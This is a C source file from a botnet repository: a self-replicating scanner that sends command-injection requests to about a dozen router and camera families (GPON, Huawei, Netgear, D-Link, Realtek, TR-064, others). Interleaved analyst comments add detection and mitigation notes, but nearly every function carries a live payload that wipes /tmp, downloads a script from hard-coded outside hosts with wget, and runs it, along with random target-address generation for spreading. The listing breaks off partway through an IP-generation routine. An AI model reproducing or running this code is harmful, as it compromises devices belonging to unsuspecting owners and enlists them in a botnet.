R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Self Reps/MULTI SELFREP/13exploit1selfrepFIXED.c
#ifdef SELFREP
#define _GNU_SOURCE
//BY ROOTSEC
#ifdef DEBUG
#include <stdio.h>
#endif
#include <stdlib.h>
#include <stdarg.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <signal.h>
#include <strings.h>
#include <string.h>
#include <sys/utsname.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <netinet/udp.h>
#include <netinet/tcp.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include "includes.h"
#include "table.h"
#include "rand.h"
#include "util.h"
#include "checksum.h"
#include "resolv.h"
#include "scanner.h"
//13 EXPLOIT SELFREP SCANNER
// Analyst note: file-scope state for a self-propagating scanner. Everything
// below is compiled only when SELFREP is defined (see the #ifdef at the top).

// Candidate first octets for generated target addresses. GPON1_Range is read
// by GPON8080_IPGen and GPON2_Range by GPON80_IPGen.
int GPON1_Range [] = {187,189,200,201,207};
int GPON2_Range [] = {1,2,5,31,37,41,42,58,62,78,82,84,88,89,91,92,95,103,113,118,145,147,178,183,185,195,210,212};
// Commented-out octet list; nothing in this listing reads it.
//int NETIS_Range [] = {1,14,27,36,39,40,42,47,49,58,59,60,61,62,94,101,103,104,106,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,139,140,144,150,153,163,171,175,180,182,183,193,202,203,210,211,216,218,219,220,221,222,223};

// fork() results: scanner_pid is set by exploit_worker, the numbered ones by
// the per-target routines (scanner2_pid is not assigned anywhere in this
// listing). The global `timeout` is not read by the visible functions;
// socket_connect_tcp declares its own local of the same name.
int scanner_pid, scanner2_pid, scanner3_pid, scanner4_pid, scanner5_pid, scanner6_pid, scanner7_pid, scanner8_pid, scanner9_pid, scanner10_pid, scanner11_pid, scanner12_pid, scanner13_pid, timeout = 100000;
// Scratch space for up to ten IPv4 addresses (4 octets each), shared and
// overwritten by every *_IPGen function.
static uint8_t ipState[40] = {0};
// Not referenced by the visible functions (exploit_worker uses a local `i`).
int max = 0, i = 0;
// Open a TCP connection to host:port and return the socket descriptor.
//
// host is resolved with gethostbyname(); a 3-second send timeout
// (SO_SNDTIMEO) is requested on the socket. Returns 0 when name resolution,
// socket() or connect() fails. Every caller in this file treats any non-zero
// return as a usable socket.
int socket_connect_tcp(char *host, in_port_t port) // tcp socket for sending POST/GET requests
{
    struct hostent *hp;
    struct sockaddr_in addr;
    int on = 1, sock;
    struct timeval timeout;
    timeout.tv_sec = 3; // 3 sec timeout on socket
    timeout.tv_usec = 0;
    if ((hp = gethostbyname(host)) == NULL) return 0;
    // Copy the first resolved address into the IPv4 sockaddr.
    bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    // Only the send direction gets a timeout; no SO_RCVTIMEO is set here.
    setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout));
    if (sock == -1) return 0;
    if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
    return sock;
}
// Empty stub: declared to return int but the body contains no statements and
// no return. Nothing in this listing calls it.
int socket_connect_udp(char *host, in_port_t port) // udp socket for netis explotation
{
}
// Analyst summary: one-shot HTTP command-injection attempt on TCP port 8080
// (the name suggests GPON home gateways; the code itself only fixes the port
// and URI).
//
// Forks; the parent returns immediately, the child sends one request and
// exits. The request is a POST to /GponForm/diag_Form?images/ whose dest_host
// form field carries shell metacharacters followed by a wget-and-sh sequence
// that pulls a script from 176.32.33.88.
//
// Detection: the URI, the literal "Host: 127.0.0.1:8080" header arriving from
// a remote peer, and the User-Agent "r00ts3c-owned-you" are fixed strings that
// can be matched in IDS/WAF rules or proxy logs; outbound HTTP from the device
// to the download host is a follow-on indicator.
// Mitigation (general): keep the device's web management interface off
// untrusted networks and apply vendor firmware updates.
void exploit_socket_gpon8080(unsigned char *host)
{
    scanner3_pid = fork();

    // Parent (pid > 0) or failed fork (-1): nothing more to do here.
    if (scanner3_pid > 0 || scanner3_pid == -1)
        return;

    int gpon_socket1;
    char gpon_request1[1024];

    gpon_socket1 = socket_connect_tcp((char *)host, 8080);

    sprintf(gpon_request1, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://176.32.33.88/gpon8080+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0");

    // socket_connect_tcp returns 0 on failure.
    if (gpon_socket1 != 0)
    {
        write(gpon_socket1, gpon_request1, strlen(gpon_request1));
        usleep(200000);
        close(gpon_socket1);
#ifdef DEBUG
        // No response is read, so this line only shows that the TCP connect
        // succeeded, not that the device was affected.
        printf("[gpon_8080] exploitable %s\n", host);
#endif
    }
    // Child process ends here; the caller's loop continues in the parent.
    exit(0);
}
// Analyst summary: same request shape as the port-8080 GPON routine, aimed at
// TCP port 80.
//
// Forks; the child sends one POST to /GponForm/diag_Form?images/ with a
// dest_host field that carries an injected wget-and-sh sequence fetching a
// script from 176.32.33.88, then exits.
//
// Detection: fixed URI, literal "Host: 127.0.0.1:80" header from a remote
// peer, and User-Agent "r00ts3c-owned-you".
// Mitigation (general): do not expose the management web interface to
// untrusted networks; apply vendor firmware updates.
void exploit_socket_gpon80(unsigned char *host)
{
    scanner4_pid = fork();

    // Parent or failed fork returns; only the child continues.
    if (scanner4_pid > 0 || scanner4_pid == -1)
        return;

    int gpon_socket2;
    char gpon_request2[1024];

    gpon_socket2 = socket_connect_tcp((char *)host, 80);

    sprintf(gpon_request2, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://176.32.33.88/gpon80+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0");

    // socket_connect_tcp returns 0 on failure.
    if (gpon_socket2 != 0)
    {
        write(gpon_socket2, gpon_request2, strlen(gpon_request2));
        usleep(200000);
        close(gpon_socket2);
#ifdef DEBUG
        // Printed after a successful connect and write; no response is checked.
        printf("[gpon_80] exploitable %s\n", host);
#endif
    }
    exit(0);
}
// Analyst summary: two-stage UPnP SOAP command-injection attempt on TCP port
// 52869 (name suggests Realtek-based devices; only the port and URI are fixed
// by the code).
//
// Forks; the child sends two AddPortMapping SOAP requests to /picsdesc.xml on
// one connection, 5 seconds apart. In both, the NewInternalClient element
// holds a backtick-quoted shell command: the first downloads a file from
// 209.141.42.3 (a different host from the other routines in this file), the
// second marks it executable and runs it.
//
// Detection: SOAPAction ...WANIPConnection:1#AddPortMapping on port 52869,
// backticks inside NewInternalClient, the fixed ports 47500/44382, the
// description "syncthing", and User-Agent "r00ts3c-owned-you".
// Mitigation (general): block WAN-side access to the UPnP/SOAP service and
// apply vendor firmware updates.
void exploit_socket_realtek(unsigned char *host)
{
    scanner5_pid = fork();

    // Parent or failed fork returns; only the child continues.
    if (scanner5_pid > 0 || scanner5_pid == -1)
        return;

    int realtek_socket;
    char realtek_request[1024], realtek_request2[1024];

    realtek_socket = socket_connect_tcp((char *)host, 52869);

    // Stage 1: fetch. Stage 2 (below): chmod and execute.
    sprintf(realtek_request, "POST /picsdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; rm -rf*; wget http://209.141.42.3/realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n", host);
    sprintf(realtek_request2, "POST /picsdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;chmod +x realtek;./realtek realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n", host);

    // socket_connect_tcp returns 0 on failure.
    if (realtek_socket != 0)
    {
        write(realtek_socket, realtek_request, strlen(realtek_request));
        sleep(5);
        write(realtek_socket, realtek_request2, strlen(realtek_request2));
        usleep(200000);
        close(realtek_socket);
#ifdef DEBUG
        // Printed without reading any response from the peer.
        printf("[realtek] exploitable %s\n", host);
#endif
    }
    exit(0);
}
148
149
// Analyst summary: HTTP GET command-injection attempt sent to both TCP 8080
// and TCP 80 (name suggests Netgear devices; the code fixes only ports and
// URI).
//
// Forks; the child connects to both ports, then sends the same request to each
// socket that connected: GET /setup.cgi with todo=syscmd and a cmd parameter
// that removes files under /tmp, downloads a script from 176.32.33.88 and runs
// it with sh.
//
// Detection: /setup.cgi with "todo=syscmd" and "currentsetting.htm=1" in the
// query string; the request is HTTP/1.0 with no headers at all (no Host, no
// User-Agent).
// Mitigation (general): restrict access to the device web interface and apply
// vendor firmware updates.
void exploit_socket_netgear(unsigned char *host)
{
    scanner6_pid = fork();

    // Parent or failed fork returns; only the child continues.
    if (scanner6_pid > 0 || scanner6_pid == -1)
        return;

    int netgear_socket, netgear_socket2;
    char netgear_request[1024];

    netgear_socket = socket_connect_tcp((char *)host, 8080);
    netgear_socket2 = socket_connect_tcp((char *)host, 80);

    sprintf(netgear_request, "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://176.32.33.88/netgear+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n");

    // socket_connect_tcp returns 0 on failure.
    if (netgear_socket != 0)
    {
        write(netgear_socket, netgear_request, strlen(netgear_request));
        usleep(200000);
        close(netgear_socket);
#ifdef DEBUG
        // Printed without reading any response from the peer.
        printf("[netgear_8080] exploitable %s\n", host);
#endif
    }
    if (netgear_socket2 != 0)
    {
        write(netgear_socket2, netgear_request, strlen(netgear_request));
        usleep(200000);
        close(netgear_socket2);
#ifdef DEBUG
        printf("[netgear_80] exploitable %s\n", host);
#endif
    }
    exit(0);
}
// Analyst summary: SOAP command-injection attempt on TCP port 37215 (name and
// the "HuaweiHomeGateway" realm suggest Huawei home gateways).
//
// Forks; the child sends one POST to /ctrlt/DeviceUpgrade_1 with a static
// Digest Authorization header and an Upgrade SOAP body whose NewStatusURL
// element contains a $(...) command substitution that uses busybox wget to
// fetch a file from 176.32.33.88 and run it with sh.
//
// Detection: the URI on port 37215; the Authorization header's nonce,
// response and cnonce are hard-coded, so they repeat byte-for-byte across
// attempts; "$(" inside NewStatusURL/NewDownloadURL; the marker
// "$(echo HUAWEIUPNP)".
// Mitigation (general): block WAN-side access to this port and apply vendor
// firmware updates.
void exploit_socket_huawei(unsigned char *host)
{
    // Stores the fork result in scanner6_pid, the same variable the netgear
    // routine uses.
    scanner6_pid = fork();

    // Parent or failed fork returns; only the child continues.
    if (scanner6_pid > 0 || scanner6_pid == -1)
        return;

    int huawei_socket;
    char huawei_request[1024];

    huawei_socket = socket_connect_tcp((char *)host, 37215);

    sprintf(huawei_request, "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: %s:37215\r\nContent-Length: 601\r\nConnection: keep-alive\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 176.32.33.88 -l /tmp/huawei -r /huawei; sh /tmp/huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>", host);

    // socket_connect_tcp returns 0 on failure.
    if (huawei_socket != 0)
    {
        write(huawei_socket, huawei_request, strlen(huawei_request));
        usleep(200000);
        close(huawei_socket);
#ifdef DEBUG
        // Printed without reading any response from the peer.
        printf("[huawei] exploitable %s\n", host);
#endif
    }
    exit(0);
}
// Analyst summary: SOAP command-injection attempt against TCP ports 7574 and
// 5555 (name suggests the TR-064 CPE management service).
//
// Forks; the child connects to both ports and sends each connected socket a
// POST to /UD/act?1 with SOAPAction ...Time:1#SetNTPServers. The
// NewNTPServer1 element holds a backtick-quoted command that clears /tmp,
// fetches a script from 176.32.33.88 with busybox wget and runs it; the other
// NTP server fields hold `echo OMNI`.
//
// Detection: SetNTPServers requests on 7574/5555 with backticks in any
// NewNTPServer field, the literal "Host: 127.0.0.1:<port>" header from a
// remote peer, the "OMNI" marker, and User-Agent "r00ts3c-owned-you".
// Mitigation (general): the management service should not be reachable from
// the WAN side; apply vendor firmware updates.
void exploit_socket_tr064(unsigned char *host)
{
    scanner7_pid = fork();

    // Parent or failed fork returns; only the child continues.
    if (scanner7_pid > 0 || scanner7_pid == -1)
        return;

    int tr064_socket, tr064_socket2;
    char tr064_request[1024], tr064_request2[1024];

    tr064_socket = socket_connect_tcp((char *)host, 7574);
    tr064_socket2 = socket_connect_tcp((char *)host, 5555);

    // The two requests differ only in the port named in the Host header.
    sprintf(tr064_request, "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7574\r\nUser-Agent: r00ts3c-owned-you\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://176.32.33.88/tr064 && sh /tmp/tr064`</NewNTPServer1><NewNTPServer2>`echo OMNI`</NewNTPServer2><NewNTPServer3>`echo OMNI`</NewNTPServer3><NewNTPServer4>`echo OMNI`</NewNTPServer4><NewNTPServer5>`echo OMNI`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>", host);
    sprintf(tr064_request2, "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:5555\r\nUser-Agent: r00ts3c-owned-you\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://176.32.33.88/tr064 && sh /tmp/tr064`</NewNTPServer1><NewNTPServer2>`echo OMNI`</NewNTPServer2><NewNTPServer3>`echo OMNI`</NewNTPServer3><NewNTPServer4>`echo OMNI`</NewNTPServer4><NewNTPServer5>`echo OMNI`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>", host);

    // socket_connect_tcp returns 0 on failure.
    if (tr064_socket != 0)
    {
        write(tr064_socket, tr064_request, strlen(tr064_request));
        usleep(200000);
        close(tr064_socket);
#ifdef DEBUG
        // Printed without reading any response from the peer.
        printf("[tr064_7574] exploitable %s\n", host);
#endif
    }
    if (tr064_socket2 != 0)
    {
        write(tr064_socket2, tr064_request2, strlen(tr064_request2));
        usleep(200000);
        close(tr064_socket2);
#ifdef DEBUG
        printf("[tr064_5555] exploitable %s\n", host);
#endif
    }
    exit(0);
}
// Analyst summary: HNAP SOAP request on TCP port 80 with a shell command
// placed in the SOAPAction header.
//
// Forks; the child sends one POST to /HNAP1/. The SOAPAction header value is
// http://purenetworks.com/HNAP1/ followed by a backtick-quoted command that
// clears /tmp, downloads a script from 176.32.33.88 and runs it. The body is
// an AddPortMapping envelope with fixed filler values.
//
// Detection: backticks (or other shell metacharacters) in a SOAPAction header
// on /HNAP1/; the fixed body values "foobar", 192.168.0.100 and port 1234.
// No User-Agent header is sent.
// Mitigation (general): disable remote management over HTTP and apply vendor
// firmware updates.
void exploit_socket_hnap(unsigned char *host)
{
    scanner8_pid = fork();

    // Parent or failed fork returns; only the child continues.
    if (scanner8_pid > 0 || scanner8_pid == -1)
        return;

    int hnap_socket;
    char hnap_request[1024];

    hnap_socket = socket_connect_tcp((char *)host, 80);

    sprintf(hnap_request, "POST /HNAP1/ HTTP/1.0\r\nHost: %s:80\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://176.32.33.88/hnap && sh /tmp/hnap`\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>\r\n\r\n", host);

    // socket_connect_tcp returns 0 on failure.
    if (hnap_socket != 0)
    {
        write(hnap_socket, hnap_request, strlen(hnap_request));
        usleep(200000);
        close(hnap_socket);
#ifdef DEBUG
        // Printed without reading any response from the peer.
        printf("[hnap] exploitable %s\n", host);
#endif
    }
    exit(0);
}
// Analyst summary: HTTP GET command-injection attempt on TCP port 81, with
// the command embedded in the URL path.
//
// Forks; the child sends one GET whose path begins /language/Swedish and
// continues with a shell sequence that uses ${IFS} in place of spaces to clear
// /tmp, download a script from 176.32.33.88 and run it.
//
// Detection: "${IFS}" or "&&" inside a request path under /language/; the
// request is HTTP/1.0 with no headers.
// Mitigation (general): keep the device web interface off untrusted networks
// and apply vendor firmware updates.
void exploit_socket_crossweb(unsigned char *host)
{
    scanner9_pid = fork();

    // Parent or failed fork returns; only the child continues.
    if (scanner9_pid > 0 || scanner9_pid == -1)
        return;

    int crossweb_socket;
    char crossweb_request[1024];

    crossweb_socket = socket_connect_tcp((char *)host, 81);

    sprintf(crossweb_request, "GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://176.32.33.88/crossweb;sh${IFS}/tmp/crossweb&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n");

    // socket_connect_tcp returns 0 on failure.
    if (crossweb_socket != 0)
    {
        write(crossweb_socket, crossweb_request, strlen(crossweb_request));
        usleep(200000);
        close(crossweb_socket);
#ifdef DEBUG
        // Printed without reading any response from the peer.
        printf("[crossweb] exploitable %s\n", host);
#endif
    }
    exit(0);
}
// Analyst summary: HTTP GET to a /shell endpoint on TCP port 80, passing a
// shell command as the query string.
//
// Forks; the child sends one GET /shell?... whose query clears /tmp, downloads
// a script from 176.32.33.88 and runs it with sh.
//
// Detection: requests for /shell with shell syntax in the query string and
// User-Agent "r00ts3c-owned-you".
// Mitigation (general): devices answering on such an endpoint should not be
// reachable from untrusted networks; apply vendor firmware updates.
void exploit_socket_jaws(unsigned char *host)
{
    scanner10_pid = fork();

    // Parent or failed fork returns; only the child continues.
    if (scanner10_pid > 0 || scanner10_pid == -1)
        return;

    int jaws_socket;
    char jaws_request[1024];

    jaws_socket = socket_connect_tcp((char *)host, 80);

    sprintf(jaws_request, "GET /shell?cd+/tmp;rm+-rf+*;wget+http://176.32.33.88/jaws;sh+/tmp/jaws HTTP/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nHost: %s:80\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n", host);

    // socket_connect_tcp returns 0 on failure.
    if (jaws_socket != 0)
    {
        write(jaws_socket, jaws_request, strlen(jaws_request));
        usleep(200000);
        close(jaws_socket);
#ifdef DEBUG
        // Printed without reading any response from the peer.
        printf("[jaws] exploitable %s\n", host);
#endif
    }
    exit(0);
}
// Analyst summary: UPnP SOAP command-injection attempt on TCP port 49152
// (name suggests D-Link devices; the code fixes only the port and URI).
//
// Forks; the child sends one POST to /soap.cgi?service=WANIPConn1 with an
// AddPortMapping body whose NewInternalClient element holds a backtick-quoted
// command that clears /tmp, downloads a script from 176.32.33.88 and runs it.
//
// Detection: /soap.cgi?service=WANIPConn1 on port 49152 with backticks in
// NewInternalClient; fixed ports 634 and 45 in the body; User-Agent
// "r00ts3c-owned-you".
// Mitigation (general): block WAN-side access to the UPnP/SOAP service and
// apply vendor firmware updates.
void exploit_socket_dlink(unsigned char *host)
{
    scanner11_pid = fork();

    // Parent or failed fork returns; only the child continues.
    if (scanner11_pid > 0 || scanner11_pid == -1)
        return;

    int dlink_socket;
    char dlink_request[1024];

    dlink_socket = socket_connect_tcp((char *)host, 49152);

    sprintf(dlink_request, "POST /soap.cgi?service=WANIPConn1 HTTP/1.1\r\nHost: %s:49152\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://176.32.33.88/dlink;sh /tmp/dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>\r\n\r\n", host);

    // socket_connect_tcp returns 0 on failure.
    if (dlink_socket != 0)
    {
        write(dlink_socket, dlink_request, strlen(dlink_request));
        usleep(200000);
        close(dlink_socket);
#ifdef DEBUG
        // Printed without reading any response from the peer.
        printf("[dlink] exploitable %s\n", host);
#endif
    }
    exit(0);
}
// Analyst summary: request to TCP port 8443 with a shell sequence embedded in
// a /cgi-bin/ path (called from R7000_IPGen in this file).
//
// Forks; the child writes one string starting "GET /cgi-bin/;" followed by
// ${IFS}-separated commands that clear /var/tmp, download a script from
// 176.32.33.88 and run it.
//
// Detection: ";" and "${IFS}" immediately after /cgi-bin/ in a request path.
// Mitigation (general): restrict access to the device web interface and apply
// vendor firmware updates.
void exploit_socket_r7064(unsigned char *host)
{
    scanner12_pid = fork();

    // Parent or failed fork returns; only the child continues.
    if (scanner12_pid > 0 || scanner12_pid == -1)
        return;

    int r7064_socket;
    char r7064_request[1024];

    r7064_socket = socket_connect_tcp((char *)host, 8443);

    sprintf(r7064_request, "GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://176.32.33.88/netgear2;${IFS}sh${IFS}/var/tmp/netgear2");

    // socket_connect_tcp returns 0 on failure.
    if (r7064_socket != 0)
    {
        write(r7064_socket, r7064_request, strlen(r7064_request));
        usleep(200000);
        close(r7064_socket);
#ifdef DEBUG
        // Printed without reading any response from the peer.
        printf("[r7064] exploitable %s\n", host);
#endif
    }
    exit(0);
}
// Analyst summary: request to /board.cgi on TCP port 8080 with a shell
// command in the cmd parameter (name suggests Vacron recorders; the code fixes
// only the port and URI).
//
// Forks; the child writes one string starting "GET /board.cgi?cmd=" followed
// by a sequence that clears /tmp, downloads a script from 176.32.33.88 and
// runs it.
//
// Detection: /board.cgi with shell syntax (";", "wget") in the cmd parameter.
// Mitigation (general): keep the device web interface off untrusted networks
// and apply vendor firmware updates.
void exploit_socket_vacron(unsigned char *host)
{
    scanner13_pid = fork();

    // Parent or failed fork returns; only the child continues.
    if (scanner13_pid > 0 || scanner13_pid == -1)
        return;

    int vacron_socket;
    char vacron_request[1024];

    vacron_socket = socket_connect_tcp((char *)host, 8080);

    sprintf(vacron_request, "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://176.32.33.88/vacron;sh+/tmp/vacron");

    // socket_connect_tcp returns 0 on failure.
    if (vacron_socket != 0)
    {
        write(vacron_socket, vacron_request, strlen(vacron_request));
        usleep(200000);
        close(vacron_socket);
#ifdef DEBUG
        // Printed without reading any response from the peer.
        printf("[vacron] exploitable %s\n", host);
#endif
    }
    exit(0);
}
// Analyst summary: same /board.cgi request shape and port (TCP 8080) as the
// vacron routine in this file; only the downloaded file name differs.
//
// Forks; the child writes one string starting "GET /board.cgi?cmd=" followed
// by a sequence that clears /tmp, downloads a script named awsec2 from
// 176.32.33.88 and runs it.
//
// Detection: /board.cgi with shell syntax in the cmd parameter; on the wire
// this is indistinguishable from the vacron request apart from the file name.
// Mitigation (general): keep the device web interface off untrusted networks
// and apply vendor firmware updates.
void exploit_socket_awsec2(unsigned char *host)
{
    // Stores the fork result in scanner13_pid, the same variable the vacron
    // routine uses.
    scanner13_pid = fork();

    // Parent or failed fork returns; only the child continues.
    if (scanner13_pid > 0 || scanner13_pid == -1)
        return;

    int awsec2_socket;
    char awsec2_request[1024];

    awsec2_socket = socket_connect_tcp((char *)host, 8080);

    sprintf(awsec2_request, "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://176.32.33.88/awsec2;sh+/tmp/awsec2");

    // socket_connect_tcp returns 0 on failure.
    if (awsec2_socket != 0)
    {
        // The length expression names vacron_request, not awsec2_request.
        write(awsec2_socket, awsec2_request, strlen(vacron_request));
        usleep(200000);
        close(awsec2_socket);
#ifdef DEBUG
        // Printed without reading any response from the peer.
        printf("[awsec2] exploitable %s\n", host);
#endif
    }
    exit(0);
}
// Analyst summary: target selection for the port-8080 GPON routine.
//
// Builds six dotted-quad strings per call and hands each to
// exploit_socket_gpon8080. The first octet comes from GPON1_Range; the other
// three octets are rand() % 255 (values 0-254). rand() is reseeded from the
// wall clock on every call. Octets are staged in the shared ipState buffer
// (slots 0-23).
//
// Detection: a burst of outbound TCP connection attempts to port 8080 on
// unrelated addresses whose first octet is one of the GPON1_Range values.
void GPON8080_IPGen()
{
    char gpon_ip1[16] = {0};char gpon_ip2[16] = {0};char gpon_ip3[16] = {0};
    char gpon_ip4[16] = {0};char gpon_ip5[16] = {0};char gpon_ip6[16] = {0};

    srand(time(NULL));
    // Indices into GPON1_Range for the six first octets.
    int gpon_range1 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range2 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range3 = rand() % (sizeof(GPON1_Range)/sizeof(char *));
    int gpon_range4 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range5 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range6 = rand() % (sizeof(GPON1_Range)/sizeof(char *));

    // First octet of each address (every fourth slot).
    ipState[0] = GPON1_Range[gpon_range1];ipState[4] = GPON1_Range[gpon_range2];ipState[8] = GPON1_Range[gpon_range3];
    ipState[12] = GPON1_Range[gpon_range4];ipState[16] = GPON1_Range[gpon_range5];ipState[20] = GPON1_Range[gpon_range6];
